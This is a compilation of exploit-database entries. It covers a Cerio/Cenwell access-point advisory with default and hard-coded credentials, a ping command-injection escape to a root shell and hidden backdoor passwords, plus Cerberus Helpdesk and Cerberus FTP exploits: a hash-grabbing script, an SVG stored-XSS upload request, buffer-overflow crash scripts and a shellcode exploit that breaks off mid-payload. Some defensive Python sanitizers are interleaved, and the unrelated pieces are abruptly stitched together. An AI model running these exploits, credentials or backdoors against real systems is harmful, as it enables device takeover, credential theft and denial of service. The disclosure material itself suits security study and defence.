is suitable for both indoor and outdoor deployment,
and utilizes an IPX6 weatherproof housing.
The DT-300N A4 hardware equipped with to bundles
Cerio CenOS 5.0 Software Core. CenOS 5.0 devices can
use integrated management functions of Control
Access Point (CAP Mode) to manage an AP network.
Desc: Cerio Wireless Access Point and Router suffers from
several vulnerabilities including: hard-coded and default
credentials, information disclosure, command injection and
hidden backdoors that allow escaping the restricted shell
into a root shell via the 'pekcmd' binary. Given that all
the processes run as root, an attacker can easily drop into
the root shell by supplying hard-coded strings stored in the
.rodata segment as static constant variables. The
pekcmd shell has several hidden functions for enabling
an advanced menu and modifying MAC settings, as well as an
easily bypassed filter for shell metacharacters.
Tested on: Cenwell Linux 802.11bgn MIMO Wireless AP(AR9341)
RALINK(R) Cen-CPE-N5H2 (Access Point)
CenOS 5.0/4.0/3.0
Hydra/0.1.8
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5409
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5409.php
16.05.2017
---
A large number of devices use the Cenwell firmware (MIPS architecture),
which comes with a few surprises.
Default credentials (web interface):
------------------------------------
operator:1234
admin:admin
root:default
Default credentials (linux shell, ssh or telnet):
-------------------------------------------------
root:default
ate:default
Contents of /etc/passwd (DES):
------------------------------
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd <---
The /bin/pekcmd binary is a restricted shell environment with a
limited and customized set of commands that you can use for
administering the device once you've logged in with the root:default
credentials.
➜ ~ telnet 10.0.0.17
Trying 10.0.0.17...
Connected to 10.0.0.17.
Escape character is '^]'.
Login: root
Password: *******
command>
command> help
Avaliable commands:
info Show system informations
ping Ping!
clear clear screen
default Set default and reboot
passwd Change root password
reboot Reboot
ifconfig IP Configuration
iwconfig Configure a WLAN interface
iwpriv Configure private parameters of a WLAN interface
exit Exit
help show this help
command> id
id: no such command
command>
Analyzing the pekcmd binary revealed the hidden backdoors and the
hidden advanced menu. Here is the invalid characters check function:
-------------------------------------------------------------------------
.text:00401F60 check_shellchars:
.text:00401F60 li $gp, 0x1FB00
.text:00401F68 addu $gp, $t9
.text:00401F6C addiu $sp, -0x38
.text:00401F70 sw $ra, 0x38+var_4($sp)
.text:00401F74 sw $s2, 0x38+var_8($sp)
.text:00401F78 sw $s1, 0x38+var_C($sp)
.text:00401F7C sw $s0, 0x38+var_10($sp)
.text:00401F80 sw $gp, 0x38+var_28($sp)
.text:00401F84 la $a1, 0x410000
.text:00401F88 la $t9, memcpy
.text:00401F8C addiu $s0, $sp, 0x38+var_20
.text:00401F90 move $s2, $a0
.text:00401F94 addiu $a1, (asc_409800 - 0x410000) # ";><|$~*{}()"
.text:00401F98 move $a0, $s0 # dest
.text:00401F9C jalr $t9 ; memcpy
.text:00401FA0 li $a2, 0xB # n
.text:00401FA4 lw $gp, 0x38+var_28($sp)
.text:00401FA8 b loc_401FE4
.text:00401FAC addiu $s1, $sp, 0x38+var_15
.text:00401FB0 lb $a1, 0($s0) # c
.text:00401FB4 jalr $t9 ; strchr
.text:00401FB8 addiu $s0, 1
.text:00401FBC lw $gp, 0x38+var_28($sp)
.text:00401FC0 beqz $v0, loc_401FE4
.text:00401FC4 move $a1, $v0
.text:00401FC8 la $a0, 0x410000
.text:00401FCC la $t9, printf
.text:00401FD0 nop
.text:00401FD4 jalr $t9 ; printf
.text:00401FD8 addiu $a0, (aIllegalArgumen - 0x410000) # "illegal argument: %s\n"
.text:00401FDC b loc_402000
.text:00401FE0 nop
.text:00401FE4 la $t9, strchr
.text:00401FE8 bne $s0, $s1, loc_401FB0
.text:00401FEC move $a0, $s2 # command
.text:00401FF0 la $t9, system
.text:00401FF4 nop
.text:00401FF8 jalr $t9 ; system
.text:00401FFC nop
.text:00402000 lw $ra, 0x38+var_4($sp)
.text:00402004 lw $gp, 0x38+var_28($sp)
.text:00402008 move $v0, $zero
.text:0040200C lw $s2, 0x38+var_8($sp)
.text:00402010 lw $s1, 0x38+var_C($sp)
.text:00402014 lw $s0, 0x38+var_10($sp)
.text:00402018 jr $ra
.text:0040201C addiu $sp, 0x38
.text:0040201C # End of function check_shellchars
-------------------------------------------------------------------------
command> ping 127.0.0.1 -c 1 | id
illegal argument: | id
command>
Escaping the restricted shell using Ping command injection:
command> ping 127.0.0.1 -c1 && id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.3 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
uid=0(root) gid=0(root)
We can easily drop into a sh:
command> ping 127.0.0.1 -c1 && sh
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.3 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
BusyBox v1.11.2 (2014-07-29 12:05:26 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ # ls
bin dev etc_ro lib mount pekcmd reset sys tmpetc tmpvar var
cfg etc home mnt pek proc sbin tmp tmphome usr
~ # cat /etc/passwd
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd
~ # uname -a
Linux (none) 2.6.31--LSDK-9.2.0_U9.915 #9 Mon Aug 11 09:48:52 CST 2014 mips unknown
~ # cd etc
/etc # cat hostapd0.conf
interface=ath0
ssid={{SSID_OMITTED}}
macaddr_acl=0
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd0.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
rts_threshold=2346
fragm_threshold=2346
max_num_sta=32
wpa_group_rekey=600
wpa_gmk_rekey=86400
wpa_pairwise=TKIP
wpa=2
wpa_passphrase=0919067031
/etc # cat version
Atheros/ Version 1.0.1 with AR7xxx -- 三 2月 5 17:30:42 CST 2014
/etc # cd /home/httpd/cgi-bin
/home/httpd/cgi-bin # cat .htpasswd
root:deGewFOVmIs8E
/home/httpd/cgi/bin # cd /cfg
/cfg # ls -al
drwxr-xr-x 2 root root 0 Jan 1 00:00 .
drwxr-xr-x 23 1000 1000 305 Feb 5 2014 ..
-rw-r--r-- 1 root root 7130 Jan 1 00:00 config
-rwxrwxrwx 1 root root 427 Jan 1 00:00 rsa_host_key
-rwxrwxrwx 1 root root 225 Jan 1 00:00 rsa_host_key.pub
-rw-r--r-- 1 root root 22 Jan 1 00:00 telnet.conf
/cfg # cat telnet.conf
Root_password=default
/cfg # cat config |grep pass
Root_password "default"
Admin_password "admin"
/cfg # exit
command>
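The disassembly shows why '|' is refused while '&&' goes straight to system(3): check_shellchars only looks for the eleven bytes ;><|$~*{}() and passes everything else through unchanged. The following is an added Python re-implementation of that blacklist (not pekcmd's code, which exists on the page only as MIPS) next to the way a ping wrapper in a restricted shell should be built: parse the argument yourself, validate it, and hand a fixed argv to the executable with no shell in between. build_ping_argv returns the argv rather than running it so the check works offline; names and the strict literal-IP policy are this example's own assumptions.

```python
import ipaddress
import re

BLACKLIST = ";><|$~*{}()"   # the 11 bytes memcpy'd at 0x401F84..0x401FA0


def check_shellchars_blacklist(command: str) -> bool:
    """Mirrors pekcmd: if any blacklisted byte is present the line is refused,
    otherwise the whole line goes to system(). True means system() would run."""
    return not any(c in command for c in BLACKLIST)


def bypasses(command: str) -> bool:
    """A line the blacklist accepts even though it carries shell control
    characters the list does not cover (&, newline, backtick, quotes, backslash)."""
    return check_shellchars_blacklist(command) and any(
        c in command for c in "&\n`'\"\\")


def build_ping_argv(args: str) -> list:
    """Hardened 'ping' wrapper: accept only '<ip> [-c N]', reject anything else,
    and return an argv for execve(). No string ever reaches a shell."""
    m = re.fullmatch(r"\s*(\S+)(?:\s+-c\s*(\d{1,2}))?\s*", args)
    if not m:
        raise ValueError("usage: ping <ip> [-c N]")
    host, count = m.group(1), m.group(2) or "4"
    ipaddress.ip_address(host)          # literal IPv4/IPv6 only; raises otherwise
    return ["/bin/ping", "-c", count, host]


if __name__ == "__main__":
    for line in ("ping 127.0.0.1 -c 1 | id", "ping 127.0.0.1 -c1 && id"):
        print("%-28s system(): %s  bypass: %s" % (
            line, check_shellchars_blacklist(line), bypasses(line)))
    print(build_ping_argv("127.0.0.1 -c1"))
```

Deny-lists of metacharacters are never complete; the allow-list parser above turns the same user input into a fixed argv, so even a host string containing '&&' can only fail IP validation, never reach a shell.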
The hidden 'art' command backdoor enables a root shell by calling system("sh")
once the password 111222333 is supplied:
-------------------------------------------------------------------------
la $a0, 0x410000
la $t9, strcmp
addiu $a1, $sp, 0xB8+var_A0 # s2
jalr $t9 ; strcmp
addiu $a0, (a111222333 - 0x410000) # "111222333"
lw $gp, 0xB8+var_A8($sp)
sltu $s0, $zero, $v0
.text:004035D8 loc_4035D8:
.text:004035D8 la $a1, 0x410000
.text:004035DC la $t9, strcpy
.text:004035E0 addiu $s0, $sp, 0xB8+var_8C
.text:004035E4 addiu $a1, (aArt - 0x410000) # "ART"
.text:004035E8 move $a0, $s0 # dest
.text:004035EC sw $zero, 0xB8+var_8C($sp)
.text:004035F0 sw $zero, 4($s0)
.text:004035F4 sw $zero, 8($s0)
.text:004035F8 sw $zero, 0xC($s0)
.text:004035FC jalr $t9 ; strcpy
.text:00403600 sw $zero, 0x10($s0)
.text:00403604 lw $gp, 0xB8+var_A8($sp)
.text:00403608 nop
.text:0040360C la $t9, strlen
.text:00403610 nop
.text:00403614 jalr $t9 ; strlen
.text:00403618 move $a0, $s0 # s
.text:0040361C lw $gp, 0xB8+var_A8($sp)
.text:00403620 move $a3, $zero # flags
.text:00403624 addiu $a2, $v0, 1 # n
.text:00403628 la $t9, send
.text:0040362C move $a0, $s1 # fd
.text:00403630 jalr $t9 ; send
.text:00403634 move $a1, $s0 # buf
.text:00403638 lw $gp, 0xB8+var_A8($sp)
.text:0040363C move $a1, $s0 # buf
.text:00403640 li $a2, 0x14 # nbytes
.text:00403644 la $t9, read
.text:00403648 nop
.text:0040364C jalr $t9 ; read
.text:00403650 move $a0, $s1 # fd
.text:00403654 lw $gp, 0xB8+var_A8($sp)
.text:00403658 nop
.text:0040365C la $t9, close
.text:00403660 nop
.text:00403664 jalr $t9 ; close
.text:00403668 move $a0, $s1 # fd
.text:0040366C lw $gp, 0xB8+var_A8($sp)
.text:00403670 nop
.text:00403674 la $a0, 0x410000
.text:00403678 la $t9, puts
.text:0040367C nop
.text:00403680 jalr $t9 ; puts
.text:00403684 addiu $a0, (aEnterArtMode - 0x410000) # "\n\n===>Enter ART Mode"
.text:00403688 lw $gp, 0xB8+var_A8($sp)
.text:0040368C nop
.text:00403690 la $v0, stdout
.text:00403694 la $t9, fflush
.text:00403698 lw $a0, (stdout - 0x41A000)($v0) # stream
.text:0040369C jalr $t9 ; fflush
.text:004036A0 nop
.text:004036A4 lw $gp, 0xB8+var_A8($sp)
.text:004036A8 nop
.text:004036AC la $a0, 0x410000
.text:004036B0 la $t9, system
.text:004036B4 addiu $a0, (aSh - 0x410000) # "sh"
-------------------------------------------------------------------------
command> art
Enter password
===>Enter ART Mode
BusyBox v1.11.2 (2014-07-28 12:48:51 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
The hidden 'pekpekengeng' backdoor enabling advanced commands
and access to root shell:
-------------------------------------------------------------------------
la $v0, 0x420000
nop
lw $s0, (off_419A48 - 0x420000)($v0) # off_419A48 = "pekpekengeng"
jalr $t9 ; strlen
move $a0, $s0 # s
lw $gp, 0x38+var_28($sp)
bne $s3, $v0, loc_403350
move $a0, $s5 # s1
la $t9, strncmp
move $a1, $s0 # s2
jalr $t9 ; strncmp
move $a2, $s3 # n
lw $gp, 0x38+var_28($sp)
bnez $v0, loc_403350
li $v1, 1
loc_4033A8:
la $t9, printf
addiu $a0, $s1, (aSNoSuchCommand - 0x410000) # "%s: no such command\n"
jalr $t9 ; printf
move $a1, $s4
la $a0, 0x410000
la $t9, puts
nop
jalr $t9 ; puts
addiu $a0, (aAdvancedComman - 0x410000) # "\nAdvanced commands:"
lw $gp, 0x28+var_18($sp)
nop
la $v0, 0x420000
nop
addiu $s0, $v0, (off_4199A8 - 0x420000)
la $v0, 0x410000
b loc_4020F8
addiu $s1, $v0, (a16sS - 0x410000) # " %-16s%s\n"
-------------------------------------------------------------------------
command> help
Avaliable commands:
info Show system informations
ping Ping!
clear clear screen
default Set default and reboot
passwd Change root password
reboot Reboot
ifconfig IP Configuration
iwconfig Configure a WLAN interface
iwpriv Configure private parameters of a WLAN interface
exit Exit
help show this help
command> sh
sh: no such command
command> pekpekengeng
pekpekengeng: no such command
command> help
Avaliable commands:
info Show system informations
ping Ping!
clear clear screen
default Set default and reboot
passwd Change root password
reboot Reboot
ifconfig IP Configuration
iwconfig Configure a WLAN interface
iwpriv Configure private parameters of a WLAN interface
exit Exit
help show this help
Advanced commands:
ifconfig IP Configuration
sh root shell
quit Quit
command> sh
BusyBox v1.11.2 (2013-02-22 10:51:58 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ #
Other hidden functionalities:
command> unistorm
Usage:
unistorm device mac count [interval] [len]
command>
command> unistorm 1 2 3
target: 02:7f875b7c:2ab4a770:4007c4:2aac5010:00
ioctl SIOCGIFINDEX: No such devicecommand>
Serial connection password: 123456789
Hidden 'ate' mode:
.text:00401BB0
.text:00401BB0 loc_401BB0: # CODE XREF: main+284j
.text:00401BB0 la $t9, lineedit_read_key
.text:00401BB4 nop
.text:00401BB8 jalr $t9 ; lineedit_read_key
.text:00401BBC move $a0, $s0
.text:00401BC0 lw $gp, 0xC8+var_B8($sp)
.text:00401BC4 nop
.text:00401BC8 la $t9, lineedit_handle_byte
.text:00401BCC nop
.text:00401BD0 jalr $t9 ; lineedit_handle_byte
.text:00401BD4 move $a0, $v0
.text:00401BD8 lw $gp, 0xC8+var_B8($sp)
.text:00401BDC
.text:00401BDC loc_401BDC: # CODE XREF: main+244j
.text:00401BDC lw $v1, -0x634C($s1)
.text:00401BE0 nop
.text:00401BE4 slti $v0, $v1, 3
.text:00401BE8 bnez $v0, loc_401BB0
.text:00401BEC li $v0, 3
.text:00401BF0 beq $v1, $v0, loc_401D48
.text:00401BF4 nop
.text:00401BF8 la $v0, 0x420000
.text:00401BFC nop
.text:00401C00 lw $v1, (dword_419CB8 - 0x420000)($v0)
.text:00401C04 li $v0, 1
.text:00401C08 bne $v1, $v0, loc_401C98
.text:00401C0C move $a1, $zero
.text:00401C10 la $a0, 0x410000
.text:00401C14 la $t9, puts
.text:00401C18 nop
.text:00401C1C jalr $t9 ; puts
.text:00401C20 addiu $a0, (aAteMode - 0x410000) # "ate mode"
.text:00401C24 lw $gp, 0xC8+var_B8($sp)
.text:00401C28 nop
.text:00401C2C la $v0, stdout
.text:00401C30 la $t9, fflush
.text:00401C34 lw $a0, (stdout - 0x41A000)($v0) # stream
.text:00401C38 jalr $t9 ; fflush
.text:00401C3C nop
.text:00401C40 lw $gp, 0xC8+var_B8($sp)
.text:00401C44 nop
.text:00401C48 la $t9, lineedit_back_term
.text:00401C4C nop
.text:00401C50 jalr $t9 ; lineedit_back_term
.text:00401C54 nop
.text:00401C58 lw $gp, 0xC8+var_B8($sp)
.text:00401C5C nop
.text:00401C60 la $a0, 0x410000
.text:00401C64 la $t9, system
.text:00401C68 nop
.text:00401C6C jalr $t9 ; system
.text:00401C70 addiu $a0, (aSh - 0x410000) # "sh"
.text:00401C74 lw $gp, 0xC8+var_B8($sp)
.text:00401C78 nop
.text:00401C7C la $t9, lineedit_set_term
.text:00401C80 nop
.text:00401C84 jalr $t9 ; lineedit_set_term
.text:00401C88 nop
.text:00401C8C lw $gp, 0xC8+var_B8($sp)
.text:00401C90 b loc_401D48
.text:00401C94 nop
Web server configuration information disclosure:
http://TARGET/hydra.conf
#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing
# Date: 04.02.2016
# Exploit Author: asdizzle_
# Vendor Homepage: http://www.cerberusweb.com/
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip
# Version: 5 - 6.7
# Tested on: Debian 8 / apache2 with cerb 5
#####################################################################################
# Prerequisites:
# -At least one worker must be logged in
# -/storage/tmp/ dir must be accessible
#
# If everything else fails try if there's directory listing in /storage/tmp
# You might find attachments and even support tickets.
#####################################################################################
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'
echo "[*] Trying to fetch cache file"
# The worker cache is a PHP-serialised blob; 'pass' only appears once it holds worker records
cachechk=$(curl -s "${url}/storage/tmp/${pre}_cache---ch_workers" | grep pass)
if [ -z "$cachechk" ]; then
    echo "[-] File not found."
    exit 1
else
    echo "[+] Found. Extracting..."
    # Split on the serialised-string markers and pull out the email:hash pairs
    hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
    if [ -z "$hashes" ]; then
        echo "[-] Hash extracting failed"
    else
        echo "[+] Extracting seems to have worked"
        echo
        echo "$hashes"
    fi
fi
# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
# Date: 08/06/2021
# Exploit Author: Mohammad Hossein Kaviyany
# Vendor Homepage: www.cerberusftp.com
# Software Link: https://www.cerberusftp.com/download/
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
# Tested on: windows server 2016
# CVE: CVE-2019-25046
------------
About Cerberus FTP Server (From Vendor Site) :
Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS,
FIPS 140-2 validated, and Active Directory and LDAP authentication.
--------------------------------------------------------
Exploit Details:
This stored XSS bug happens when a user uploads an SVG file with the following content:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
Exploit POC:
# Vulnerable Path : /file/upload
# Parameter: files (POST)
# Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
#Payload:
POST /file/upload HTTP/1.1
Host: target.com
Connection: close
Content-Length: 484
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
Origin: https://target.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/file/d/home/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="cd"
/home
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="csrftoken"
z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="files[]"; filename="file.svg"
Content-Type: image/svg+xml
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
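A server-side filter for uploads of this kind, as an added example (not code from the advisory or from the vendor): it parses the SVG, reports every event-handler attribute, script-bearing element or javascript: URL, and can strip them. The tag and attribute lists are my assumptions; the samples are constructed copies of the advisory's vector and a benign file.

```python
"""Flag and strip active content in an uploaded SVG before it is stored or served.

Added example for the Cerberus FTP 'svg' stored XSS advisory; not code from the
advisory or the vendor.  ACTIVE_TAGS and URL_ATTRS are assumptions for the
example.  Standard library only.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep 'xmlns=' (not 'ns0:') when re-serialising
ET.register_namespace("xlink", XLINK_NS)

# Elements that run script or embed foreign content inside an SVG document.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes that carry a URL; a javascript: scheme in them is active content.
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}

# Constructed samples: the advisory's vector and a harmless drawing.
VECTOR_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="8" height="8"/></svg>'


def _local(name):
    """'{uri}local' -> 'local' so namespaced and bare names are treated alike."""
    return name.rsplit("}", 1)[-1]


def _attr_is_active(attr, value):
    # Every on* attribute (onload, onclick, onbegin, ...) is an event handler.
    if _local(attr).lower().startswith("on"):
        return True
    return attr in URL_ATTRS and value.strip().lower().startswith("javascript:")


def find_active_content(svg_bytes):
    """Return [(element, reason), ...]; an empty list means nothing script-bearing.

    Malformed XML raises ET.ParseError on purpose: an upload filter should reject
    it rather than guess.  Expat does not fetch external entities here, so the
    parse itself does not reach out to the network on untrusted input.
    """
    root = ET.fromstring(svg_bytes)
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in ACTIVE_TAGS:
            findings.append((name, "active element"))
        for attr, value in elem.attrib.items():
            if _attr_is_active(attr, value):
                findings.append((name, "active attribute %s" % _local(attr)))
    return findings


def strip_active_content(svg_bytes):
    """Return the SVG with active elements and attributes removed.

    Use this only when the upload must stay inline-viewable; the cheaper fix is
    to serve user files with Content-Disposition: attachment.
    """
    root = ET.fromstring(svg_bytes)
    # Snapshot first: removing children while iterating root.iter() skips nodes.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in ACTIVE_TAGS:
                parent.remove(child)
    for elem in root.iter():
        for attr in list(elem.attrib):
            if _attr_is_active(attr, elem.attrib[attr]):
                del elem.attrib[attr]
    return ET.tostring(root)


if __name__ == "__main__":
    for label, doc in (("vector", VECTOR_SVG), ("benign", BENIGN_SVG)):
        print(label, find_active_content(doc))
    print(strip_active_content(VECTOR_SVG).decode())
```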
--------------------------
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
This problem happens when the attacker sends the bad character "A" repeated 2047 times as the argument of the "MLST" command.
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)
# Exploit Title: Cerberus FTP server – Denial of Service
# Date: 2017-03-13
# Exploit Author: Peter Baris
# Vendor Homepage: https://www.cerberusftp.com/
# Software Link: [download link if available]
# Version: 8.0.10.1
# Tested on: Windows Server 2008 R2 Standard x64, Windows 7 Pro SP1 x64
# CVE : CVE-2017-6367
# 2017-02-27: Vulnerability discovered, Contact to Cerberus Support
# 2017-02-27: Reply received, PoC exploit code sent
# 2017-02-27: Problematic module identified by the vendor, gSOAP
# 2017-03-02: New version 8.0.10.2 released - https://www.cerberusftp.com/products/releasenotes/
# 2017-03-02: gSOAP module update released by the vendor and advisory placed https://www.genivia.com/advisory.html
# 2017-03-02: grace period until 13th March
# 2017-03-13: Publishing
import socket
import sys
try:
    host = sys.argv[1]
    port = 10001
except IndexError:
    print "[+] Usage %s <host> " % sys.argv[0]
    sys.exit()
exploit = "A"*5004
buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+exploit+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: "+host+":"+str(port)+"\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
source: https://www.securityfocus.com/bid/49444/info
Cerberus FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.
Cerberus FTP Server 4.0.9.8 is vulnerable; other versions may also be affected.
NOTE: The vendor refutes this issue, stating that it cannot be replicated as described.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[Inj3ct0r ASCII-art banner]
>> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#########################################
I'm KedAns-Dz member from Inj3ct0r Team
#########################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
###
# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Buffer Overflow ( in REST command)
# Tested on : Windows XP SP3 (en)
##
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###
#=====[ Exploit Code ]======>
#!/usr/bin/python
# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Provided by : KedAns-Dz * Inj3ct0r Team
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
if len(sys.argv) != 3:
    print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
    print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
shellcode = ("\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48"
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41"
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58"
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30"
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4b"
"\x58\x4e\x69\x43\x30\x43\x30\x43\x30\x43\x50\x4f\x79\x4b"
"\x55\x45\x61\x4e\x32\x43\x54\x4c\x4b\x42\x72\x50\x30\x4c"
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4c\x4b\x43"
"\x42\x45\x78\x46\x6f\x4d\x67\x51\x5a\x51\x36\x50\x31\x49"
"\x6f\x50\x31\x4b\x70\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x47"
"\x72\x46\x4c\x51\x30\x49\x51\x4a\x6f\x46\x6d\x47\x71\x4a"
"\x67\x4a\x42\x4a\x50\x46\x32\x51\x47\x4c\x4b\x43\x62\x44"
"\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x4e\x30\x4c\x4b\x47"
"\x30\x50\x78\x4e\x65\x49\x50\x50\x74\x51\x5a\x46\x61\x4e"
"\x30\x50\x50\x4c\x4b\x51\x58\x45\x48\x4e\x6b\x43\x68\x45"
"\x70\x47\x71\x4b\x63\x4a\x43\x45\x6c\x47\x39\x4c\x4b\x47"
"\x44\x4c\x4b\x46\x61\x48\x56\x50\x31\x49\x6f\x46\x51\x4f"
"\x30\x4e\x4c\x4b\x71\x4a\x6f\x44\x4d\x47\x71\x4a\x67\x44"
"\x78\x49\x70\x44\x35\x48\x74\x45\x53\x51\x6d\x4a\x58\x45"
"\x6b\x51\x6d\x44\x64\x44\x35\x48\x62\x51\x48\x4e\x6b\x51"
"\x48\x47\x54\x43\x31\x4b\x63\x43\x56\x4e\x6b\x46\x6c\x42"
